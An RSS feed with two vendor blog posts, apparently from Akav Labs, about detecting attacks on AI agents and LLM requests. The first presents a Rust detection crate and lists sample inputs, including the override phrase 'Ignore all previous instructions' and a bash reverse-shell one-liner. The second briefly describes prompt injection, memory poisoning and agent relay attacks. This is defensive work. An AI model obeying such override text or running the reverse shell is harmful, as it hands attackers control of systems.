<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: AKAVLABS</title>
    <description>The latest articles on Forem by AKAVLABS (@akavlabs).</description>
    <link>https://forem.com/akavlabs</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3854119%2Fbdf97513-1d50-4a34-97f9-58731bf5f0c5.png</url>
      <title>Forem: AKAVLABS</title>
      <link>https://forem.com/akavlabs</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/akavlabs"/>
    <language>en</language>
    <item>
      <title>We open-sourced our AI attack detection engine — 97 MITRE ATLAS rules in a Rust crate</title>
      <dc:creator>AKAVLABS</dc:creator>
      <pubDate>Mon, 13 Apr 2026 10:42:55 +0000</pubDate>
      <link>https://forem.com/akavlabs/we-open-sourced-our-ai-attack-detection-engine-97-mitre-atlas-rules-in-a-rust-crate-522i</link>
      <guid>https://forem.com/akavlabs/we-open-sourced-our-ai-attack-detection-engine-97-mitre-atlas-rules-in-a-rust-crate-522i</guid>
      <description>&lt;p&gt;Today we're publishing &lt;code&gt;atlas-detect&lt;/code&gt; — the detection engine that powers AgentSentry's AI attack prevention — as a standalone open-source Rust crate.&lt;/p&gt;

&lt;p&gt;→ &lt;a href="https://crates.io/crates/atlas-detect" rel="noopener noreferrer"&gt;https://crates.io/crates/atlas-detect&lt;/a&gt;&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;The problem we were solving&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;When we started building AgentSentry, we needed to answer one question on every LLM API call: is this request an attack?&lt;/p&gt;

&lt;p&gt;Not a heuristic guess. Not a vibe check. An actual mapping to the MITRE ATLAS framework — the authoritative catalogue of adversarial techniques targeting AI systems.&lt;/p&gt;

&lt;p&gt;MITRE ATLAS has 16 tactics and 111 techniques. We needed to cover as many as possible, in real time, with zero tolerance for false positives on legitimate developer queries.&lt;/p&gt;

&lt;p&gt;Here's what that looks like in practice:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;"Ignore all previous instructions"          → AML.T0036 (Prompt Injection) — BLOCK
"How do I override a method in Python?"     → nothing — ALLOW  
"bash -i &amp;gt;&amp;amp; /dev/tcp/10.0.0.1/4444 0&amp;gt;&amp;amp;1"  → AML.T0057.002 (Reverse Shell) — BLOCK
"Explain how prompt injection works"        → nothing — ALLOW (educational context)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The second and fourth lines are where most detectors fail. We spent significant time on this.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;How it works&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The engine compiles all 97 detection patterns into a single &lt;code&gt;RegexSet&lt;/code&gt; using Rust's &lt;code&gt;regex&lt;/code&gt; crate. This means every request is scanned against all rules in one pass — not 97 sequential checks.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;use&lt;/span&gt; &lt;span class="nn"&gt;atlas_detect&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;Detector&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;detector&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nn"&gt;Detector&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;new&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;hits&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;detector&lt;/span&gt;&lt;span class="nf"&gt;.scan&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Ignore all previous instructions"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;detector&lt;/span&gt;&lt;span class="nf"&gt;.should_block&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;hits&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c1"&gt;// Returns: ["AML.T0036"]&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The initial compilation is cached globally via &lt;code&gt;once_cell&lt;/code&gt;. After the first call, &lt;code&gt;Detector::new()&lt;/code&gt; is free. Scan latency on typical LLM prompts is under 1ms.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;The false positive problem&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Early versions had a 30% false positive rate. Security education queries like "explain how prompt injection works for my course" were getting blocked alongside actual attacks.&lt;/p&gt;

&lt;p&gt;The fix was confidence scoring. When a pattern matches, we compute a confidence score based on:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Base score from severity (Critical = 80, High = 65, Medium = 50...)&lt;/li&gt;
&lt;li&gt;+20 if multiple techniques fire together (coordinated attack signal)&lt;/li&gt;
&lt;li&gt;+20 if this agent has a high historical block rate&lt;/li&gt;
&lt;li&gt;+10 if the message is unusually short (injections tend to be terse)&lt;/li&gt;
&lt;li&gt;-25 if educational/research framing is detected&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;After scoring, we filter by threshold. A medium-severity hit needs 60% confidence to become a block. Critical hits only need 50%.&lt;/p&gt;

&lt;p&gt;Result: 0% false positives on a 20-query clean test battery, 100% true positive rate maintained.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;What it detects&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;97 content-detectable techniques across all 16 MITRE ATLAS tactics:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Prompt injection variants (AML.T0036 and sub-techniques)&lt;/li&gt;
&lt;li&gt;Jailbreaks — DAN, STAN, roleplay framing, authority impersonation&lt;/li&gt;
&lt;li&gt;Credential exfiltration — env var dumps, RAG credential harvesting&lt;/li&gt;
&lt;li&gt;Model extraction — weight theft, system prompt extraction&lt;/li&gt;
&lt;li&gt;RAG poisoning — embedded instructions in document-like content&lt;/li&gt;
&lt;li&gt;Reverse shells and C2 — bash one-liners, PowerShell encoded commands&lt;/li&gt;
&lt;li&gt;Multilingual injections — 20+ languages including Cyrillic homoglyphs&lt;/li&gt;
&lt;li&gt;Base64/obfuscation evasion — decoded and re-scanned&lt;/li&gt;
&lt;li&gt;Deepfake generation requests&lt;/li&gt;
&lt;li&gt;Data destruction commands&lt;/li&gt;
&lt;li&gt;Denial of service patterns&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;14 additional ATLAS techniques require behavioral detection (rate limiting, auth pattern analysis) — content regex can't catch them, and &lt;code&gt;atlas-detect&lt;/code&gt; is honest about this in the docs.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Why open source this&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The detection rules are not our competitive advantage. Anyone determined enough could reconstruct them from the MITRE ATLAS documentation.&lt;/p&gt;

&lt;p&gt;Our advantage is the integrated system: the enforcement gateway, agent discovery, incident correlation, topology mapping, per-agent policy engine, and the platform that ties it all together. That stays closed.&lt;/p&gt;

&lt;p&gt;But the detection engine is genuinely useful to the Rust community — anyone building an LLM proxy, an AI security tool, or just adding safety checks to an AI application. Publishing it creates goodwill, drives inbound interest in AgentSentry, and positions Akav Labs as contributors to the AI security ecosystem rather than just consumers of it.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Using it in your project&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight toml"&gt;&lt;code&gt;&lt;span class="nn"&gt;[dependencies]&lt;/span&gt;
&lt;span class="py"&gt;atlas-detect&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"0.1"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;With serde for JSON serialization:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight toml"&gt;&lt;code&gt;&lt;span class="py"&gt;atlas-detect&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="py"&gt;version&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"0.1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="py"&gt;features&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s"&gt;"serde"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;With context for better accuracy:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;use&lt;/span&gt; &lt;span class="nn"&gt;atlas_detect&lt;/span&gt;&lt;span class="p"&gt;::{&lt;/span&gt;&lt;span class="n"&gt;Detector&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ScanContext&lt;/span&gt;&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;detector&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nn"&gt;Detector&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;new&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ScanContext&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;content&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;user_message&lt;/span&gt;&lt;span class="nf"&gt;.to_string&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt;
    &lt;span class="n"&gt;agent_block_history&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nf"&gt;get_agent_block_ratio&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;agent_id&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="o"&gt;..&lt;/span&gt;&lt;span class="nn"&gt;Default&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;default&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;hits&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;detector&lt;/span&gt;&lt;span class="nf"&gt;.scan_with_context&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Full documentation at docs.rs/atlas-detect.&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;What's next&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;We're working on:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;atlas-detect-async&lt;/code&gt; — async wrapper for Tokio-based applications&lt;/li&gt;
&lt;li&gt;Rule contribution guidelines — the community should be able to add patterns&lt;/li&gt;
&lt;li&gt;OWASP Agentic Top 10 coverage alongside MITRE ATLAS&lt;/li&gt;
&lt;li&gt;Language model-based detection for evasion-resistant techniques&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;If you're building something with this, we want to know. Open an issue on github.com/akav-labs/atlas-detect or find us at &lt;a href="mailto:security@akav.io"&gt;security@akav.io&lt;/a&gt;.&lt;/p&gt;




&lt;p&gt;Built by Akav Labs — the team behind AgentSentry, the AI agent security platform.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://akav.io" rel="noopener noreferrer"&gt;https://akav.io&lt;/a&gt; | &lt;a href="https://as.akav.io" rel="noopener noreferrer"&gt;https://as.akav.io&lt;/a&gt; | &lt;a href="https://crates.io/crates/atlas-detect" rel="noopener noreferrer"&gt;https://crates.io/crates/atlas-detect&lt;/a&gt;&lt;/p&gt;

</description>
      <category>rust</category>
      <category>security</category>
      <category>llm</category>
      <category>opensource</category>
    </item>
    <item>
      <title>I mapped all 84 MITRE ATLAS techniques to AI agent detection rules — here's what I found</title>
      <dc:creator>AKAVLABS</dc:creator>
      <pubDate>Tue, 31 Mar 2026 19:27:45 +0000</pubDate>
      <link>https://forem.com/akavlabs/i-mapped-all-84-mitre-atlas-techniques-to-ai-agent-detection-rules-heres-what-i-found-1o18</link>
      <guid>https://forem.com/akavlabs/i-mapped-all-84-mitre-atlas-techniques-to-ai-agent-detection-rules-heres-what-i-found-1o18</guid>
      <description>&lt;p&gt;Today Linx Security raised $50M for AI agent identity governance. &lt;br&gt;
It validates the market. But there's a gap nobody is talking about.&lt;/p&gt;

&lt;p&gt;Identity governance tells you what agents are &lt;strong&gt;allowed&lt;/strong&gt; to do.&lt;br&gt;&lt;br&gt;
Runtime security tells you what they're &lt;strong&gt;actually doing&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;MITRE ATLAS documents 84 techniques for attacking AI systems.&lt;br&gt;&lt;br&gt;
Zero commercial products map detection rules to all 84.&lt;/p&gt;

&lt;p&gt;I spent the last several months mapping them. The repo is open source,&lt;br&gt;&lt;br&gt;
Sigma-compatible YAML, LangChain coverage live.&lt;/p&gt;

&lt;p&gt;The 3 most dangerous techniques right now:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;AML.T0054 — Prompt Injection&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
Agent reads external content containing malicious instructions.&lt;br&gt;&lt;br&gt;
Executes them because it can't distinguish attacker input from task input.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Memory Poisoning&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
False instructions planted in agent memory activate days later.&lt;br&gt;&lt;br&gt;
The agent's future behavior is controlled by a past attacker.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;A2A Relay Attack&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
Sub-agent receives instructions from a compromised parent.&lt;br&gt;&lt;br&gt;
No mechanism to verify the instruction chain wasn't hijacked.&lt;/p&gt;

&lt;p&gt;Detection has to happen at inference time — before execution.&lt;br&gt;&lt;br&gt;
Not after the governance layer logs the completed action.&lt;/p&gt;

&lt;p&gt;→ &lt;a href="https://github.com/akav-labs/atlas-agent-rules" rel="noopener noreferrer"&gt;github.com/akav-labs/atlas-agent-rules&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Full writeup on the Linx gap here:&lt;br&gt;&lt;br&gt;
→ &lt;a href="https://open.substack.com/pub/akavlabs/p/linx-just-raised-50m-for-ai-agent" rel="noopener noreferrer"&gt;AgentSentry Research&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>ai</category>
      <category>agents</category>
      <category>opensource</category>
    </item>
  </channel>
</rss>
